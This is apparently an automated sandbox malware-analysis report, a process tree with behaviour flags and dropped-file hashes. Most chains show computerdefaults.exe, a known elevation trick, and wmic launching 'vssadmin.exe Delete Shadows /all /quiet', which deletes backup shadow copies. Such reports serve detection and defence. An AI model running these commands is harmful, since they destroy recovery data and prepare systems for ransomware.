C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5084
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1596
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4484
-
-
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe1⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:4124
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3920
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4936
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3552
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1424
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4348
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3696
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider1⤵
- Suspicious use of WriteProcessMemory
PID:1596
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2140
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:1424 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:3228
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4488
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4124 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2280
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4972
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1596
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1448
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4424
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:1368 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2176
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4728
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4372 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4032
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1552
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3068
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:640
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4964 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4240
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:3352
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4564
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:2384 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4876
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:3696
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4500
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4632
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD51386433ecc349475d39fb1e4f9e149a0
SHA1f04f71ac77cb30f1d04fd16d42852322a8b2680f
SHA256a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc
SHA512fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
5KB
MD5ace01a16bd10db0d3b17109d16c1f885
SHA178eae62efe0f45cc088168927a2f8493365a9ae5
SHA256b9afb85de285de53209fbcd183398ea5b07704a3311cecd981b1d90705a64f36
SHA512170a44aa2d7f2a8b4035d041a5223c4d8d129d7eee4f32172f8b4fa15020fc5b33f22698d0161968dd3a20ecdb6582c66cc27831e42228702065a84532357a37
-
Filesize
5KB
MD5c8c23cf9be868b6967ee8ef06375138c
SHA131ccb2d79cbcccbabb7b54746a0556612db1730c
SHA256fb2cd579ca07c18438fee1e079bfa0185cb3ffa22b78f79d51e3b7bda93b593d
SHA51216e4dc69b243b452c3f24840a26b2cb8892292b0eb82a51eab719725d4a81fd974fca426a35b628e3678f207082453192b199a3360101dfd656385b298cd628d
-
Filesize
24KB
MD5e664066e3aa135f185ed1c194b9fa1f8
SHA1358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5
SHA25686e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617
SHA51258710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD59f8ae3a3f734b3e8863b4ffc197482f0
SHA1136be55751f53a415f516bba7b586a1a119cc3f5
SHA256eda8c54629a1de49b46420d8f2e1dd5ee6f1af4b2758433ddbb30d501681e1a9
SHA512c2de4f9a8b2048789a789eb25c61504ef5154ae80ff37a85bcf5f0558cc59494447f255a7e521e7286c91aa5517d8be96051f85621a34dd303771ed2b04d08b8
-
Filesize
1KB
MD55ccd842772aaca1dad2fece3b28bb6d3
SHA166dbc30ab0e9ad3728739697fcd6d75b3dda830a
SHA256d8f055e4e61f13bd742e691d8760ac144345346bf06ca2b785c6f776d2976b9a
SHA5123fc689d8649b6cd06c94b2c2f688d2ec9ef84423af992640eca17d7fd3d5270f3849b4bddc95c14c6f972d621e3638880feb951d2ca8b9f7e1473d4517a31fe8